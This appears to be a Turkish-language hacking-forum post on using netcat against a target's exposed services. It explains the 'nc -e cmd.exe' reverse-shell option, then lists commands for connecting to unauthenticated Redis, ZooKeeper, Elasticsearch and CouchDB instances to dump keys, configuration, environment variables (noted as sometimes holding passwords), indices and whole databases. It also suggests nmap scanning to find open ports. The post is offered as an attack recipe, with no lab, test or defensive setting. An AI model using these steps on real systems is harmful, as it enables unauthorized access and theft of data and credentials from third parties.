Netcat indirme linki: Tıkla Indir (Virüs Algılanabilir Normal Karşılayın)
nc kullanımı: nc.exe -vv parametresi detaylı gösterim yapar. nc.exe -l -p <port> ise belirtilen prtu dinlemeye başlar. nc.exe -e <uygulama adı> genelde uygulama adı yerine cmd.exe yazılır reverse shell için.Ama biz nc.exe <ip> <port> kullanacağız hedefe bağlanmak için.
1. Redis (Port: 6379)
Bağlandığında ekran boş kalır. Sırasıyla şunları yaz:AUTH password (Eğer şifre varsa yaparsın , yoksa yapmana gerek yok)
KEYS *
GET anahtar_adı
2. ZooKeeper (Port: 2181)
nc ile bağlandığın an şunları çalıştır:conf (Yapılandırmayı verir)
cons (Bağlantıları gösterir)
dump (Beklemede olan tüm verileri ve oturumları döker)
envi (Çevresel değişkenleri verir, bazen burada şifreler bile olur)
3. Elasticsearch (Port: 9200)
Netcat ile bağlanınca HTTP protokolü kullanman lazım. Bağlanınca şunu yapıştır:GET /_cat/indices?v HTTP/1.1
Host: hedef_ip (Sonra iki kez Enter'a bas)
GET /tablo_adı/_search?pretty
4. HTTP Üzerinden Veritabanı (Port: 5984 - CouchDB)
Komutlar:GET /_all_dbs HTTP/1.1
Host: localhost (Sonra iki kere Enter'a bas)
Tüm veritabanı isimlerini döker.
Bunları yapmak için hedefte gerekli portların açık olması gerekir , nmap ile port taraması yaparak bulabilirsiniz.
İyi Forumlar.
Son düzenleme: